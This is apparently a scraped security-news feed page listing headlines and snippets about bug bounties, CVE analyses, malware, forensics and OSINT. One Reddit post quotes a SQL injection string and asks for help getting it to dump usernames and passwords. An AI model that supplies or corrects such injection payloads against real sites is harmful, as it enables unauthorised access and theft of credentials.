    يقال “اعمل ما تحب، ولن تشعر أنك تعمل بعد الآن”… فمن النصائح المعروفة لتبدع في عملك وتتسلى وتكسب الأموال في نفس الوقت هي أن تعمل ما تحب؛… Continue reading on Medium »
    Bug bounties, The glamour.
    Hello to the readers, it’s been a while since i wrote on medium and today this morning i feel like writing something out after analysing… Continue reading on Medium »
    How to find vulnerable websites to SQL-Injection vulnerability in real life
    In this writeup you will learn how real hackers find vulnerable websites to SQL-Injection vulnerability to perform this web application… Continue reading on Medium »
  • Open

    Computer Forensics Tools | Kroll Artifact Parser and Extractor | TryHackMe KAPE
    submitted by /u/MotasemHa [link] [comments]
    GIAC GCFE QUESTIONS
    Are the workbooks (exercises) necessary to index? submitted by /u/ScruffyBlackFables [link] [comments]
    Does law enforcement always use digital forensics for devices or drives seized as evidence?
    See title. submitted by /u/bmiller8675 [link] [comments]
  • Open

    SecWiki News 2022-05-15 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-15 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    كيفية استفادة شركات الأعمال التجارية من تقنيات الاستخبارات مفتوحة المصدر
    Use of OSINT in business Continue reading on Medium »
    SPY NEWS: 2022 — Week 19
    Summary of the espionage-related news stories for the Week 19 (8–14 May) of 2022. Continue reading on Medium »
  • Open

    [sqli-lab教程】less-1
    sqli-lab教程分享学习。
    织梦后台审计
    织梦后台可以直接上传文件,或者上传zip文件。
  • Open

    Origin IP found, WAF Cloudflare Bypass
    SMTP2GO BBP disclosed a bug submitted by mrrobot2050: https://hackerone.com/reports/1536299 - Bounty: $100

  • Open

    "Zero-Days" Without Incident - Compromising Angular via Expired npm Publisher Email Domains
    submitted by /u/mandatoryprogrammer [link] [comments]
    Three ways to hack an ATM
    submitted by /u/DiabloHorn [link] [comments]
    Exploiting a Use-After-Free for code execution in every version of Python 3
    submitted by /u/DOTheLOGA [link] [comments]
    Reverse engineering Flutter apps
    submitted by /u/lmpact_ [link] [comments]
  • Open

    Best way to capture RAM from an Android device ?
    Research based so not worried about being forensically sound. I’ve tried LiME but couldn’t get the compile to work. submitted by /u/Flxtcha [link] [comments]
    View jpg files using linux sleuth kit
    Made a smiliar post a few days back but wasn't very clear with my question so I will give it one more try. I have a school exercise where we are using sleuth kit in kali to find information about a USB image that we created using dd. Now in this excerise there is a question saying, "what does picture19.jpg represent?" So basically I have to type a command that opens up the picture and shows me it, but I don't know which one. I have the inode number, so I tried icat -o but it's just giving me lots of text as output. So what command should I be using instead to view a jpg picture for example? Hope it was more clear this time! Thanks! submitted by /u/ahmedmourad22 [link] [comments]
  • Open

    War in Ukraine / May 13
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    Navigate through but have a look at the Tarot directory!!
    http://80.56.13.139/arc/Miscellaneous/Alternative%20religions%20and%20beliefs/Tarot/ submitted by /u/Appropriate-You-6065 [link] [comments]
    Moldova's ProTV news reports
    u/ODCrawler https://pl.uniflor.biz/ProTV/ Contains several .mp4 with news reports from ProTV in Chisinau, Moldova. submitted by /u/vjandrea [link] [comments]
    Official Hewlett Packard Drivers for Printers
    submitted by /u/Mr_Brightstar [link] [comments]
    British Canoeing
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Domain Persistence: Silver Ticket Attack
    Introduction Benjamin Delpy (the creator of mimikatz) introduced the silver ticket attack in Blackhat 2014 in his abusing Kerberos session. Silver tickets are forged service The post Domain Persistence: Silver Ticket Attack appeared first on Hacking Articles.
  • Open

    Domain Persistence: Silver Ticket Attack
    Introduction Benjamin Delpy (the creator of mimikatz) introduced the silver ticket attack in Blackhat 2014 in his abusing Kerberos session. Silver tickets are forged service The post Domain Persistence: Silver Ticket Attack appeared first on Hacking Articles.
  • Open

    Credential leak on redirect
    curl disclosed a bug submitted by iylz: https://hackerone.com/reports/1568175
    Disclose STUFF member name and make actions.
    Shopify disclosed a bug submitted by zambo: https://hackerone.com/reports/968174 - Bounty: $500
    Disclose customer orders details by shopify chat application.
    Shopify disclosed a bug submitted by zambo: https://hackerone.com/reports/968165 - Bounty: $2500
    Public Postman Api Collection Leaks Internal access to https://assets-paris-dev.codefi.network/
    Consensys disclosed a bug submitted by polem4rch: https://hackerone.com/reports/1523651 - Bounty: $500
    Download full backup [Mtn.co.rw]
    MTN Group disclosed a bug submitted by ibrahimatix0x01: https://hackerone.com/reports/1516520
  • Open

    Red Teaming
    Red Teaming is a simulation of a real attacker’s activity that is based on the most up-to-date knowledge regarding risks that are relevant… Continue reading on Medium »
    Cybersecurity Skill
    Équipe rouge de cybersécurité contre équipe bleue — Principales différences expliquées Continue reading on Medium »
    SearchMap Information Collection Tool
    Searchmap is a comprehensive information collection tool for pre-penetration testing that integrates domain name resolution, IP reverse… Continue reading on Medium »
  • Open

    Easy to find vulnerabilities that might get paid [part-1]
    Hello everyone It’s me Sankalpa Baral a noob hacker from Nepal hope you all are doing great stuff I am back after a long time so today I… Continue reading on Medium »
    My New Discovery In Oracle E-Business Login Panel That Allowed To Access For All Employees…
    Hay Hunters , Hello Infosec Community Continue reading on Medium »
    Does ms15–034 still exist today ?
    Hi everyone how are you?, I hope you guys are well. I’m RyuuKhagetsu, this is my article in English, sorry if there are any mistakes. I… Continue reading on Medium »
  • Open

    SecWiki News 2022-05-14 Review
    CVE-2022-21907 http协议远程代码执行漏洞分析总结 by ourren CVE-2021-34535 RDP客户端漏洞分析 by ourren 前端JS攻防对抗 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-14 Review
    CVE-2022-21907 http协议远程代码执行漏洞分析总结 by ourren CVE-2021-34535 RDP客户端漏洞分析 by ourren 前端JS攻防对抗 by ourren 更多最新文章,请访问SecWiki
  • Open

    X (2022) Review — Oposição e proximidade
    Ti West tem muito tato com o horror, seus trabalhos não partem de um lugar muito irreconhecível e sempre mostram algo peculiar sobre o… Continue reading on Medium »
  • Open

    How universal is LogRhythm?
    Basically I’m just starting to look into wanting to be a soc analyst. I am getting my sec + rn, work a basic lvl it job trying to get a bit of exp under my belt and have an associates in IT but am planning on going back to get my ba (I’m only 22). I’ve been reading a lot of Reddit posts from here and career questions when I’m bored and I’ve been seeing a lot of things talking about trying to practice LogRhythm. Is it important to practice it for every soc job or does every company use different programs. I ask because it seems super interesting and if it can give me a boost in the field, I’d hop right on learning about it. This could be a very dumb question but I’m still relatively new so cut me some slack lol submitted by /u/Spirtedgems [link] [comments]
    Incidents to look out for in http log files
    As part of a university assignment Ed I’ve been conducted the task of analysing some log files with Splunk to find any incidents on the organisation’s network. What should I be looking out for? How can I tell if their’s a potential attack on the system such as a phishing or malware? submitted by /u/fgtethancx [link] [comments]
    Threat Intelligence at your org
    I have to write a plan for our organization to do threat intelligence. It's for compliance but we should really start doing something. At the moment, were looking at a system to automatically gather file hashes, IPs, etc and put them in our firewalls and other devices. We're also looking at a once a month briefing to our C-suite. What are you doing? submitted by /u/Odd-Kale2587 [link] [comments]
  • Open

    Zyxel silently patches command-injection vulnerability with 9.8 severity rating
    Article URL: https://arstechnica.com/information-technology/2022/05/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating/ Comments URL: https://news.ycombinator.com/item?id=31376372 Points: 5 # Comments: 0
  • Open

    关于大型互联网企业DevSecOps体系构建的总结与思考
    最近几年随着软件供应链攻击和数据安全事件的频繁出现,企业面临着重大的软件供应链安全和数据泄露风险,这间接促使了 … 继续阅读关于大型互联网企业DevSecOps体系构建的总结与思考 →
    云上攻防二三事(续)
    云上攻防系列其实早在几年前笔者就公开分享过一些思路,有兴趣的可以看看Red Teaming for Cloud … 继续阅读云上攻防二三事(续) →

  • Open

    Hacking: The Art Of Exploitation
    When studying from this book, am I supposed to learn how every code sample works from scratch or only copy paste it and learn about its purpose and functions from the author? So far I've been rewriting every sample from scratch and making sure I'm understanding it, but at the same time I'm moving too slow and was wondering if that's even the correct approach. submitted by /u/Majestic_Ideal9833 [link] [comments]
  • Open

    Is there any alternative/competitor to DBprotect?
    Im not a trustwave fan BUT, that product is excellent at what it does. Im wondering if there is an alternative to it. I know IBM has guardium, and ive used it and it is complete garbage. Plus its really made for constant DB monitoring not pen test style testing/auditing like DBprotect is. submitted by /u/networkalchemy [link] [comments]
    What is the best password manager for me?
    I was talking to a friend regarding password security and they sort of explained password managers. I of course knew they existed, but didn't know there were different kinds. According to my friend, they were roughly divided into three: manual backup, cloud backup and internet sync. My question would be which kind (and which one soecifically) would be best suited for me? I live in a city that is insecure and journalists and researchers are constantly targeted. I am afraid I could get either caught by law enforcement (not because what I do is illegal per se, but authority abuse is ripe here) or hacked by someone and have my data erased. What would you recommend for someone in my situation? submitted by /u/marypine [link] [comments]
    Is drozer still relevant for mobile pentest?
    Does anyone still use drozer for mobile pentest nowadays? I've just checked it's github page https://github.com/FSecureLABS/drozer and found that the development had been stopped. We would like to formely announce that F-Secure has stopped further development of the drozer tool. I tried the docker image and having connection refused issue, not sure what is going on. submitted by /u/w0lfcat [link] [comments]
    Bad Experiences Working With BitSight?
    Does anyone have any negative BitSight experiences to share from dealing with them at their companies? I'll go first; their paid service is worthless, their "findings" are filled with false positives, and you have to divert resources to get the score up for underwriter optics, which has nothing to do with improving your actual security posture. I really don't know how they're allowed to legally operate, it's extortion. submitted by /u/Memerkitty [link] [comments]
    tricky python code
    Hi, why does this script shows All our secrets!!! 😨 😩 😱 2 times ??? What makes me lost why passing False value gave us the same message ??? ``` class User: """system user""" def __init__(self, trusted=False): self.trusted = trusted def can_login(self): """only let's trusted friends read secrets""" return self.trusted def login(user): """Gives access to users with privilages.""" if user.can_login: print("All our secrets!!! 😨 😩 😱") else: print("No secrets for you!") hacker = User(trusted=False) friend = User(trusted=True) login(hacker) login(friend) ``` submitted by /u/Spare_Prize1148 [link] [comments]
    Hi, code injection help please
    Hi, I'm typing 1' or ‘1’=’1 in the search box when trying to find all the persons, usernames and passwords in the database. But I get the following error message: ​ There was error in your query: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 ​ The Server version is : Apache/2.4.41 (Ubuntu) and I found that is version MariaDB-5.5.41 ​ How can find the right syntax? ​ Thanks submitted by /u/Traditional_Bird_877 [link] [comments]
  • Open

    Understanding Data Sources and File Formats
    Following on the heels of my previous post regarding file formats and sharing the link to the post on LinkedIn, I had some additional thoughts that would benefit greatly from not blasting those thoughts out as comments to the original post, but instead editing and refining them via this medium. My first thought was, is it necessary for every analyst to have deep, intimate knowledge of file formats? The answer to that is a resounding "no", because it's simply not possible, and not scalable. There are too many possible file formats for analysts to be familiar with; however, if a few knowledgeable analysts, ones who understand the value of the file format information to DFIR, CTI, etc., document the information and are available to act as resources, then that should suffice. With the format a…
  • Open

    error parse uri path in curl
    curl disclosed a bug submitted by iylz: https://hackerone.com/reports/1566462
    Memory leak in CURLOPT_XOAUTH2_BEARER
    curl disclosed a bug submitted by pappacoda: https://hackerone.com/reports/1567257
    Cookie injection from non-secure context
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1560324
    [Java] CWE-016: Query to detect insecure configuration of Spring Boot Actuator
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1137966 - Bounty: $500
    [CPP]: Add query for CWE-754: Improper Check for Unusual or Exceptional Conditions when using functions scanf
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1549073 - Bounty: $1800
    [Java]: CWE-552 Add sources and sinks to detect unsafe getResource calls in Java EE applications
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1564099 - Bounty: $1800
    [CPP]: Add query for CWE-190: Integer Overflow or Wraparound when using transform after operation
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1564100 - Bounty: $500
    [Java]: CWE-321 - Query to detect hardcoded JWT secret keys
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1567588 - Bounty: $1800
  • Open

    Docker Containers Security Series
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Tom & Jelly - Google Drive video's movie
    submitted by /u/damschreeuwer [link] [comments]
    OtherPeople - Google Drive
    submitted by /u/damschreeuwer [link] [comments]
  • Open

    PowerShell Scripts used to run malicious shellcode. Reverse Shell vs Bind Shell
    submitted by /u/CyberMasterV [link] [comments]
    Hunting evasive vulnerabilities
    submitted by /u/0xdea [link] [comments]
  • Open

    War in Ukraine / May 12
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    A Chasing Scene From Tenet — An OSINT Geo Location Challenge
    Where’s the car? Continue reading on Medium »
    Cool OSINT tools you can use to gather information about a target
    Today I will go over some basic OSINT tools you should know about if you want to gather information about a target. So let’s get started! Continue reading on System Weakness »
    Membuka Konten Halaman Web Lama atau Menelusuri Arsip Internet (yang udah kehapus)
    Terkadang seorang Auditor dalam upaya pengumpulan data dan informasi dari internet, kita perlu mengunjungi kembali halaman web untuk… Continue reading on Medium »
  • Open

    RedTeam and Penetration Testing Checklist
    Red Teaming and Penetration Testing Checklist, Cheatsheet, Clickscript Continue reading on Medium »
    What I learned after hacking my first 20 boxes from Hack the Box…
    This Post is for Beginners from a Beginner’s perspective. Continue reading on Medium »
  • Open

    SecWiki News 2022-05-13 Review
    从ATT&CK V11版发布看ATT&CK的更新历程 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-13 Review
    从ATT&CK V11版发布看ATT&CK的更新历程 by ourren 更多最新文章,请访问SecWiki
  • Open

    MFA (Multi-Factor Authentication)
    Multi-factor authentication is when you use two or more authentication. factors to verify your identity. These factors include Something… Continue reading on Medium »
    Announcing Pay At Triage for Bug Bounty
    By John Turner, Staff Security Technologist & Vinay Venkateswara Rao, Senior Security Technologist Continue reading on Uber Privacy & Security »
    From android app to access admin dashboard
    One of easy and interesting vulnerability that I found and lead to access admin dashboard for company (internal system) : Continue reading on Medium »
    [Bug Bounty] Sql Injection and Bypass Sql Login
    Hi Semuanya bagaimana kabarnya ?, semoga dalam keadaan baik baik saja. Kali ini saya ingin membagikan tulisan saya mengenai bug bounty dan… Continue reading on Medium »
  • Open

    算法稳定币UST崩盘—是完美风暴还是金融围猎?
    原去中心化金融世界的第二大经济体Terra在这场史无前例的加密风暴中彻底失败。
    掌数信息:贴合传媒业务安全解决方案的四个难点 | 网安新势力SOLO发布季
    传媒行业的安全需求更关注哪些方面?有哪些安全场景?需要什么安全产品?
    疑似伊朗APT34 使用新后门针对约旦政府发起新一轮攻击
    Malwarebytes 发现一封针对约旦外交部官员进行攻击的恶意邮件,经分析该攻击来源于疑似与伊朗有关的攻击组织 APT 34。
    首发!《证券期货业网络安全管理办法(征求意见稿)》解读
    2022年4月29日,中国证监会就《证券期货业网络安全管理办法(征求意见稿)》公开征求意见。
    FreeBuf早报 | 游戏巨头暴雪再遭DDoS攻击;加拿大空军关键供应商遭勒索攻击
    全球最大的游戏开发商和发行商动视暴雪在推特上表示,其战网服务正遭受 DDoS 攻击。
    【弈合规周课堂】深度!高频通报问题之App强制、频繁、过度索取用户权限
    当前,App为实现业务功能所需,申请和使用系统权限并收集个人信息成为常态。
    渗透测试-文件上传漏洞
    件上传漏洞,字如其意,就是可能出现在一切允许上传文件的功能点。
    FreeBuf甲方群话题讨论 | 聊聊软件供应链安全及SCA技术实践
    SCA是不是应对供应链安全的最佳手段?在实际应用中还有哪些缺点?SCA与SAST等工具该如何选择?
    浅谈LAPSUS$防范那些事儿
    最近几个月,一个名为LAPSUS$的网络犯罪团伙可谓风头无两。
    大规模黑客活动破坏了数千个WordPress网站
    该活动通过在WordPress网站注入恶意JavaScript代码将访问者重定向到诈骗内容。
    勒索软件Pandora(潘多拉)样本分析报告
    主要通过钓鱼邮件、漏洞利用、RDP爆破等方式进行传播,采用Raas双重勒索的策略
    FreeBuf周报 | 勒索软件REvil 回归;哥斯达黎加因Conti攻击进入紧急状态
    勒索软件REvil 回归,新版本正在积极开发中;大规模黑客活动破坏了数千个WordPress网站。
    ElasticSearch服务器配置错误,暴露579GB用户网站记录
    两台配置错误的 ElasticSearch 服务器共暴露了约3.59(359019902)亿条记录。
    既能挖矿还能勒索,Eternity 恶意软件工具包正通过Telegram传播
    这个模块化的工具包包括了信息窃取器、挖矿器、剪切板、勒索软件程序、蠕虫传播器,以及即将上线的 DDoS攻击机器人,其中的每一个模块都单独购买。
  • Open

    前端 JS 攻防对抗
    作者:深信服千里目安全实验室 原文链接:https://mp.weixin.qq.com/s/QbfUkU0Fj7Bjk--21H2UQA 简介 网络爬虫一直以来是让网站维护人员头痛的事情,即要为搜索引擎开方便之门,提升网站排名、广告引入等,又要面对恶意爬虫做出应对措施,避免数据被非法获取,甚至出售。因此促生出爬虫和反爬虫这场旷日持久的战斗。 爬虫的开发从最初的简单脚本到PhantomJs、...
    CVE-2022-21907 http协议远程代码执行漏洞分析总结
    作者:yyjb@360高级攻防实验室 原文链接:http://noahblog.360.cn/cve-2022-21907-httpxie-yi-yuan-cheng-dai-ma-zhi-xing-lou-dong-fen-xi-zong-jie/ 背景: 2021年最近的上一个http远程代码执行漏洞CVE-2021-31166中,由于其UAF的对象生命周期的有限性,似乎并不太可能在实际...
    CVE-2021-34535 RDP客户端漏洞分析
    作者:yyjb@360高级攻防实验室 原文链接:http://noahblog.360.cn/cve-2021-34535-rdpke-hu-duan-lou-dong-fen-xi/ 背景: 2021年的八月份微软补丁日,微软公布的补丁中包含两个我们比较感兴趣的两个RCE漏洞中,另一个是cve-2021-34535 RDP客户端的代码执行漏洞。在现代windows系统中,RDP客户端不仅仅...
    CVE-2021-26432 NFS ONCRPC XDR 驱动协议远程代码执行漏洞验证过程
    作者:yyjb@360高级攻防实验室 原文链接:http://noahblog.360.cn/untitled-2/ 背景 2021年8月份有两个较严重的漏洞需要关注,其中包括NFS ONCRPC XDR Driver 远程代码执行漏洞CVE-2021-26432以及RDP客户端远程代码执行漏洞CVE-2021-34535。 我们的目标是分析这些潜在影响可能较大的漏洞是否容易在实际的场景中被...
  • Open

    前端 JS 攻防对抗
    作者:深信服千里目安全实验室 原文链接:https://mp.weixin.qq.com/s/QbfUkU0Fj7Bjk--21H2UQA 简介 网络爬虫一直以来是让网站维护人员头痛的事情,即要为搜索引擎开方便之门,提升网站排名、广告引入等,又要面对恶意爬虫做出应对措施,避免数据被非法获取,甚至出售。因此促生出爬虫和反爬虫这场旷日持久的战斗。 爬虫的开发从最初的简单脚本到PhantomJs、...
    CVE-2022-21907 http协议远程代码执行漏洞分析总结
    作者:yyjb@360高级攻防实验室 原文链接:http://noahblog.360.cn/cve-2022-21907-httpxie-yi-yuan-cheng-dai-ma-zhi-xing-lou-dong-fen-xi-zong-jie/ 背景: 2021年最近的上一个http远程代码执行漏洞CVE-2021-31166中,由于其UAF的对象生命周期的有限性,似乎并不太可能在实际...
    CVE-2021-34535 RDP客户端漏洞分析
    作者:yyjb@360高级攻防实验室 原文链接:http://noahblog.360.cn/cve-2021-34535-rdpke-hu-duan-lou-dong-fen-xi/ 背景: 2021年的八月份微软补丁日,微软公布的补丁中包含两个我们比较感兴趣的两个RCE漏洞中,另一个是cve-2021-34535 RDP客户端的代码执行漏洞。在现代windows系统中,RDP客户端不仅仅...
    CVE-2021-26432 NFS ONCRPC XDR 驱动协议远程代码执行漏洞验证过程
    作者:yyjb@360高级攻防实验室 原文链接:http://noahblog.360.cn/untitled-2/ 背景 2021年8月份有两个较严重的漏洞需要关注,其中包括NFS ONCRPC XDR Driver 远程代码执行漏洞CVE-2021-26432以及RDP客户端远程代码执行漏洞CVE-2021-34535。 我们的目标是分析这些潜在影响可能较大的漏洞是否容易在实际的场景中被...
  • Open

    Nuclei – Community Powered Vulnerability Scanner
    Article URL: https://nuclei.projectdiscovery.io/ Comments URL: https://news.ycombinator.com/item?id=31364433 Points: 1 # Comments: 0

  • Open

    Harmful Help: Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla
    We analyze a malicious compiled HTML help file delivering Agent Tesla, following the chain of attack through JavaScript and multiple stages of PowerShell. The post Harmful Help: Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla appeared first on Unit42.
  • Open

    CVE-2022-27778: curl removes wrong file on error
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1565623 - Bounty: $2400
    CVE-2022-27782: TLS and SSH connection too eager reuse
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1565624 - Bounty: $2400
    [CVE-2020-3452] Unauthenticated file read in Cisco ASA
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1555015
    [CVE-2020-3452] Unauthenticated file read in Cisco ASA
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1555021
    CVE-2020-3187 - Unauthenticated Arbitrary File Deletion
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1555027
    CVE-2020-3187 - Unauthenticated Arbitrary File Deletion
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1555025
    SQL Injection on https:///
    U.S. Dept Of Defense disclosed a bug submitted by cdl: https://hackerone.com/reports/232378
    SQL Injection on
    U.S. Dept Of Defense disclosed a bug submitted by cdl: https://hackerone.com/reports/277380
    Storage of old passwords in plain text format
    Recorded Future disclosed a bug submitted by subuganz: https://hackerone.com/reports/1549217 - Bounty: $750
  • Open

    B1txor20 Malware Exploiting Log4j Vulnerability
    Article URL: https://socradar.io/b1txor20-malware-exploiting-log4j-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31358378 Points: 1 # Comments: 1
  • Open

    AI Can Write Code Like Humans — Bugs and All
    New tools that help developers write software also generate similar mistakes. Continue reading on Medium »
    How To Handle The Aftermath Of A Cyber Attack
    Once a breach or an attack happens, the company should try to resolve the  issue in 30 days or less. During that time, the team should… Continue reading on Medium »
    Passive/Active Information Gathering: Subdomain Enumeration
    This post is design to share some of the information I’ve learned while working through the Information Gathering- Web Edition module in… Continue reading on Medium »
    Xml External Entity Web Application Vulnerability : Mechanisms Part
    XML external entity attacks (XXEs) are fascinating vulnerabilities that target the XML parsers of an application. XXEs can be very… Continue reading on Medium »
    Azuro Launches a $30,000+ Bug Bounty on Immunefi
    Azuro has launched a bug bounty on web3’s leading bug bounty platform Immunefi, with hackers being rewarded a maximum bounty of $21,500… Continue reading on Medium »
  • Open

    War in Ukraine / May 11
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    My service for spying on Telegram users…
    Today I wanted to tell you about one of my developments — “Telegram Deanonymizer”. This development allows you to identify anonymous… Continue reading on Medium »
    The Moonshot Threat Bulletin — at a glance
    Moonshot’s Threat Bulletin is a new monthly insights service providing an overview of the key events, themes and narratives discussed by… Continue reading on Medium »
    Operation Galaxios Writeup
    Operation Galaxios is an Open Source Intelligence (OSINT) competition, set up by the team over at Hactoria. Each month they release a… Continue reading on Medium »
  • Open

    Web History Using Paladin
    Hello again... I have been using Sumuri Paladin for some time now and I think it is an excellent tool! I've been thinking about its application at scene/in the field and in particular using it to find web history on a target device. I've looked at all of the tools in the toolbox but as someone who is not the strongest with CLI tools I could do with a bit of help. Any advice or suggestions on how to get Web history within Paladin would be awesome thanks! 🙂 submitted by /u/dwaynehicks2179 [link] [comments]
    Bitlocker password request without Bitlocker
    Hello everyone,yesterday I made an EnCase file from a Windows 10 computer with Tableau TX1 (nvme SSD).If I mount it with FTK Image as Logical or Physical there's no problem, I can see everything. Everything it's fine also if I convert the EnCase file in vMware machine. If I try to indexing the EnCase file with Vound W4 (or with Autopsy), this one request me the Bitlocker password, but there isn't any Bitlocker inside Windows and the Microsoft disk cryptography isn't activated. Also, when I made the forensics copy with Tableau TX1, this one alerted me that the nvme SSD was encrypted with Bitlocker, but this is not true. ​ The question is: how is it possible? How can I recover the BitLocker recovery key after I turn on the vMware Machine? submitted by /u/Zipper_Ita [link] [comments]
    Axiom timeline question
    Having some problems for some reason with highlighting a few thousand files in timeline. Can shift and get a few hundred. Right click - export doesn't allow you to select all. Space bar highlights what you have. Any way to grab all of the several thousand files in the timeline? Thanks. submitted by /u/clarkwgriswoldjr [link] [comments]
  • Open

    Developers Day CTF Walkthrough
    Assalum Alikum, This is Rehan Mumtaz from NED university . It is my first writeup for CTF challenges walkthrough . Our team m4lware ended… Continue reading on Medium »
    Invoca Capture the Flag (CTF) 2022
    A perspective from a first-time CTF host, novice penetration tester, and Security professional Continue reading on Medium »
  • Open

    30 GB of horse xrays
    https://www.xrays.horse/examinations/ submitted by /u/Pelicaros [link] [comments]
    Thousands of cute pixel art gifs
    http://www.u.arizona.edu/~patricia/cute-collection/ submitted by /u/Pelicaros [link] [comments]
  • Open

    Zyxel Firewall Unauthenticated Command Inject (CVE-2022-30525)
    submitted by /u/chicksdigthelongrun [link] [comments]
    Hacking Electron Applications - 0x101
    submitted by /u/r0075h3ll [link] [comments]
    Content Security Policy for Dummies
    submitted by /u/r0075h3ll [link] [comments]
  • Open

    SecWiki News 2022-05-12 Review
    CVE-2021-31209 分析学习 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-12 Review
    CVE-2021-31209 分析学习 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    工控安全之如何黑掉这个世界
    来聊聊如何干掉工控设备
    FreeBuf早报 | 五眼国家发布新安全建议;西班牙情报部门主管因飞马丑闻被解雇
    因俄乌冲突引发网空对抗升级,美国政府对俄罗斯可能通过卡巴斯基软件入侵国内计算机的担忧加剧。
    国家药监局发布《药品监管网络安全与信息化建设“十四五”规划》
    《规划》提出,我国要实现从制药大国向制药强国的跨越式发展,这对于药品审评审批效率和药品安全风险管理能力提出了更高的要求。
    JAVA代码审计之数据类型与运算符(2)
    mian()方法是类体中的主方法。改方法从{开始到}结束。
    供应链网络安全潜在威胁及挑战
    俄乌冲突、英国脱欧、供应链不平衡等最近发生的不寻常事件,给全球供应链带来了前所未有的挑战。
    多个网安执法机构警告:越来越多的黑客正瞄准MSPs
    近日,五眼情报联盟成员对管理服务提供商(MSPs)及其客户发出了警告。
    惠普修复了影响200多种型号的固件BUG
    惠普近期发布了BIOS更新,修复了两个影响广泛PC和笔记本电脑产品的严重漏洞.
    新型隐形 Nerbian RAT 恶意软件横空出世
    网络研究员发现一个名为 Nerbian RAT 的新型恶意软件,它具有逃避研究人员检测和分析的能力。
    勒索软件REvil 回归,新版本正在积极开发中
    研究人员对新发现的样本进行分析,发现在短时间内已经出现多个修改过的新版本,表明 REvil 再次处于积极的开发过程中。
    Operation(龙)EviLoong:“无国界”黑客的电子派对
    本文内容也仅仅是对APT-Q-29组织在过去一段时间内攻击手法做一个分享,不讨论受害单位。
    恶意NPM软件包瞄准德国公司进行供应链攻击
    5月11日,网络安全研究人员在NPM注册表中发现了一些恶意软件包,专门针对一些位于德国的知名媒体、物流和工业公司进行供应链攻击。
    FreeBuf早报 | 欧盟指责俄攻击乌卫星网络;REvil勒索软件团伙沉寂半年后回归
    欧盟指责俄罗斯在2月24日攻击了Viasat运营的乌克兰KA-SAT卫星网络。这次网络攻击造成了乌克兰的通信中断,也影响了几个欧盟成员国。
  • Open

    Disambiguation: Privilege vs. Access vs. Permission
    New to infosec and I feel like these have discrete meaning but are used interchangeably. Any help in defining the vernacular understanding would be appreciated. So specifically, I'm looking for what you think most people think the definition is. ​ Access: an abstraction meaning permissions to access an object (file, image). ​ Privilege: Right granted to an agent [identity] (ie, a user or a nonpeople identity) to “do something,” like run a program. Sometimes, it’s used to define rights that are abnormal, special, or temporary. ​ Permission: a property specifically of an object (file) that delineates which agents are permitted to use the object and what they can do with it (read/modify etc). ​ So in contrast, access is about getting to objects, privilege is about running stuff, and permissions are the individual configs sitting on an object or agent that tell you what they can/cant do. Thanks for any help... submitted by /u/AreThoseNewSlacks [link] [comments]
  • Open

    Api endpoint- Revealed Transaction Details of about Millions of users
    No content preview
  • Open

    Api endpoint- Revealed Transaction Details of about Millions of users
    No content preview
  • Open

    Api endpoint- Revealed Transaction Details of about Millions of users
    No content preview

  • Open

    TCU Live: 2022MAY11 (latest release)
    The latest version of "TCU Live" (2022MAY11) has been released. It's running the latest Debian sid packages, Linux 5.17 kernel, and third party packages such as the Tor Browser, checkra1n, apfs-fuse, floss, etc. See the README in the link for more information: https://drive.google.com/drive/folders/0B8zx3qPcj9rJVjJrcnB4aXl1VG8?resourcekey=0-gjI_o4MHtiCvsjet9TCygw&usp=sharing It's built to be fairly lean and extensible and is great for in-house forensics, OSINT, field work, or if you just need to quickly spin up a Linux box. If you are looking for something that'll boot on almost all x86-64 (AMD64) hardware give it a shot and DM me if you have any comments or issues. submitted by /u/atdt0 [link] [comments]
    FTK exif search
    Hi all I am trying to search for specific exif details. Apparently according to FTK 7.4 and beyond you can parse this data and create columns out of it. Well if you can, I can’t work it out at all. I’m after exif that I can clearly see in the exif properties of image files, but how do I search it? Eg: exif.image.imagedescription I’d be perfectly happy with that in a column and all the details in there. Just after some pointers on how I go about sorting the data. Thank you submitted by /u/Cerveza87 [link] [comments]
  • Open

    Ddosify – Simple Load Testing Tool
    submitted by /u/binaryfor [link] [comments]
    URL spoofing in Box, Google, and Zoom
    submitted by /u/rsobers [link] [comments]
  • Open

    Go 1.18 Stabilizes Generics, Fuzzing, Multi-Module Support,Improves Performance
    Article URL: https://www.infoq.com/news/2022/03/go-1-18-stable/ Comments URL: https://news.ycombinator.com/item?id=31346891 Points: 5 # Comments: 0
    Earn $200K by fuzzing for a weekend: Part 1
    Article URL: https://secret.club/2022/05/11/fuzzing-solana.html Comments URL: https://news.ycombinator.com/item?id=31346190 Points: 43 # Comments: 3
  • Open

    How encrypted is the reddit mobile app?
